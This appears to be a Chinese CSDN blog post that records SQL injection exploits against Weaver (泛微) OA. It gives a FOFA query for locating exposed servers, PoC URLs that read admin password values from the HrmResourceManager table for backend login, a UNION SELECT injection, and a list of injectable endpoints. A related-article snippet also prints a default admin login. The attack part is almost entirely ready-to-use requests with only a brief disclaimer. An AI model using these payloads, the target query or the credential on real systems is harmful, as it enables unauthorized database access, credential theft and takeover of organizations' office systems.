泛微OA-SQL注入漏洞

最新推荐文章于 2024-04-16 16:07:05 发布
最新推荐文章于 2024-04-16 16:07:05 发布
阅读量8.6k 收藏 7
点赞数
分类专栏: 渗透测试自学日志之漏洞复现篇 文章标签: sql web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/maverickpig/article/details/122649016
版权

2021年进入网络安全行业,作为网络安全的小白,分享一些自学基础教程给大家。希望在自己能体系化的总结自己已有的知识的同时,能对各位博友有所帮助。文章内容比较基础,都是参考了很多大神的文章,各位不喜勿喷,谢谢!如果文章对您有帮助,将是我创作的最大动力!
工作中遇到的漏洞,记录一下,本文仅作学习之用,请勿进行网络犯罪,遵守《网络安全法》等相关法律法规。

漏洞描述

泛微OA不同版本都存在SQL注入漏洞

FOFA

app=“泛微-协同办公OA”

漏洞复现

1、泛微OA V8 SQL注入漏洞

POC

http://xxx.xxx.xxx.xxx/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager

返回了数据库第一条记录的值
通过解密后,可以登录后台(漏洞原理可参考附录文章)

2、泛微OA某版本的SQL注入漏洞(核实中)

POC

http://xxx.xxx.xxx.xxx/Api/portal/elementEcodeAddon/getSqlData?sql=select%20user

3、后台SQL注入

使用测试账户登录,然后访问

http://xx.cn:8028/general/file_folder/file_new/neworedit/index.php?FILE_SORT=&CONTENT_ID=123&SORT_ID=166&func_id=&operationType=editFromRead&docStr=

其中的CONTENT_ID参数能够注射SQL语句。

http://xx.cn:8028/general/file_folder/file_new/neworedit/index.php?FILE_SORT=&CONTENT_ID=-4%20union%20select%201,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19%23&SORT_ID=166&func_id=&operationType=editFromRead&docStr=

管理员情况下的注入:

http://www.e-cology.cn/systeminfo/sysadmin/sysadminEdit.jsp?id=1

普通用户注入:

http://xx.cn//cowork/CoworkLogView.jsp?id=151

普通用户注入地址:

http://xx.cn/system/basedata/basedata_role.jsp?roleid=32

普通用户注入地址:

http://xx.cn//system/basedata/basedata_hrm.jsp?resourceid=3

继续收集中,未完待续…

参考文章

泛微OA V8 SQL注入漏洞

maverickpig
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
泛微 OA e-cology9 存在 sql 注入
nnn2188185的博客
04-29 1402
微信公众号搜索:南风漏洞复现文库该文章 南风漏洞复现文库 公众号首发泛微 E-Cology9 协同办公系统是一套基于 JSP 及 SQL Server 数据库的 OA 系统,包括知识文档管理、人力资源管理、客户关系管理、项目管理、财务管理、工作流程管理、数据中心等打造协同高效的企业管理环境,突破企业人、财、物、信息、流程等各种资源之间的屏障,并将集团各企业、企业各部门、各分支机构、以及企业与外部的供应商、分销商、客户及其他合作伙伴等整合在一个统一的平台上,使企业变成一个电子化的内外部协同工作的组织。
漏洞复现】泛微OA E-Cology Browser SQL注入漏洞
最新发布
晚风不及你
05-16 549
泛微OA E-Cology browser存在SQL注入漏洞,允许攻击者非法访问和操作数据库,可能导致数据泄露、篡改、删除,甚至控制整个服务器。
漏洞复现】泛微 e-cology 前台SQL注入漏洞
2301_79099363的博客
07-12 2028
漏洞复现】泛微 e-cology 前台SQL注入漏洞
泛微e-cology9 SQL注入漏洞复现(QVD-2023-5012)
ZL_1618的博客
03-09 1633
泛微协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。泛微e-cology9中存在SQL注入漏洞,未经身份认证的远程攻击者即可利用此漏洞获取数据库敏感信息,进一步利用可能导致目标系统被控。
泛微OA8前台sql注入1
08-08
cmd=getSelectAllId&sql=***注入点 在getdata.jsp中,直接将request对象交给weaver.hrm.common.Ajax
漏洞复现 泛微OA E-Cology V9 browser.jsp SQL注入漏洞
qq_50854662的博客
03-20 7780
漏洞复现 泛微OA E-Cology V9 browser.jsp SQL注入漏洞
2021-泛微OA V8 SQL注入漏洞
weixin_43227251的博客
04-13 1万+
泛微OA V8 SQL注入漏洞 漏洞描述 泛微OA V8 存在SQL注入漏洞,攻击者可以通过漏洞获取管理员权限和服务器权限 漏洞影响 泛微OA V8 FOFA app=“泛微-协同办公OA漏洞复现 在getdata.jsp中,直接将request对象交给 weaver.hrm.common.AjaxManager.getData(HttpServletRequest, ServletContext) : 方法处理 在getData方法中,判断请求里cmd参数是否为空,如果不为空,调用proc方法 P
泛微OA V8 SQL注入漏洞和文件上传漏洞
热门推荐
qq_52469895的博客
04-11 1万+
fofa语句 app="泛微-协同办公OA" SQL注入泛微OA V8中的getdata.jsp文件里,通过gatData方法将数据获取并回显在页面上,而在getData方法中,判断请求里cmd参数是否为空,如果不为空,调用proc方法。其中它存在四个参数,分别为空字符串、cmd参数值、request对象以及serverContext对象,通过对cmd参数值进行判断,当cmd值等于getSelectAllId时,再从请求中获取sql和type两个参数值,并将参数传递进getSelectAllIds
泛微_OA_V8_SQL注入漏洞
MD@@nr丫卡uer
04-09 1146
fofa app="泛微-协同办公OA" POC http://url/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%201234%20as%20id EXP http://url/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager MD5解码 使用账号 sysadmin/Magimix123
泛微 Ecology OA SQL 注入漏洞通告
05-05
泛微 Ecology OA SQL 注入漏洞通告
泛微OA-ecology-二次开发实例-开发完整说明.pdf
10-02
泛微OA-ecology-二次开发实例-开发完整说明.pdf
泛微E-Office10远程代码执行漏洞
05-06
2. **使用防护类设备**:对相关资产进行SQL注入等网络攻击的防护措施。 3. **监控和审计**:加强对服务器的监控和审计,以便及时发现异常行为或潜在的攻击尝试。 4. **备份数据**:定期备份重要数据,以防万一发生...
泛微e-office短信插件_泛微短信接口开发_e-office短信发送设置
02-11
泛微e-office短信插件设置指南 在泛微e-office V10.0版本中,设置短信发送功能需要通过泛微短信接口进行开发。下面将详细介绍泛微e-office短信插件的设置步骤和泛微短信接口的开发过程。 一、泛微e-office短信插件...
漏洞复现-泛微WeaverOA系列
aming小老弟
10-03 1077
泛微OA
泛微最新漏洞汇总----实时更新!!!_泛微漏洞,2024年最新网络安全程序员必会
erthre的博客
04-16 1459
知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。(img-tih2xQ74-1713254808442)]app.name=“泛微 e-cology 9.0 OA
泛微OA e-cology FileDownloadForOutDoc前台SQL注入漏洞
maverickpig的博客
08-09 1815
免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。更多复现文章可关注:网安小白成长日记。
漏洞预警】泛微E-cology OA系统SQL注入漏洞
NOSEC2019的博客
10-10 2852
2019年10月,白帽汇安全研究院观测外网出现泛微办公软件的SQL注入漏洞,攻击者可在未经身份验证的情况下进行攻击,获得系统敏感数据。该漏洞目前属于0day,所有使用了Oracle数据库的泛微网站都有可能受到影响,且利用难度低,危害大(可获取密码等敏感信息),预计会对泛微的主要服务地区——中国市场产生一定冲击。 该漏洞是由于OA系统的WorkflowCenterTreeData接口中涉及Orac...
【1day】复现泛微OA某版本SQL注入漏洞
记录并分享学习安全的知识点..
08-21 611
泛微e-cology是一款由泛微网络科技开发的协同管理平台,支持人力资源、财务、行政等多功能管理和移动办公。泛微OA存在SQL注入漏洞,攻击者利用Web应用程序对用户输入验证上的疏忽,在输入的数据中包含对某些数据库系统有特殊意义的符号或命令,让攻击者有机会直接对后台数据库系统下达指令,进而实现对后台数据库乃至整个应用系统的入侵。
泛微OA-E9流程表单前端接口API详解
"该文档详细介绍了泛微OA-E9流程表单前端接口API,主要针对V21版本,包括了接口的使用规范、移动端兼容性、前端代码开发方式以及PC端打开表单的方法等关键内容。" 在泛微OA-E9系统中,所有的流程表单前端接口被封装...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值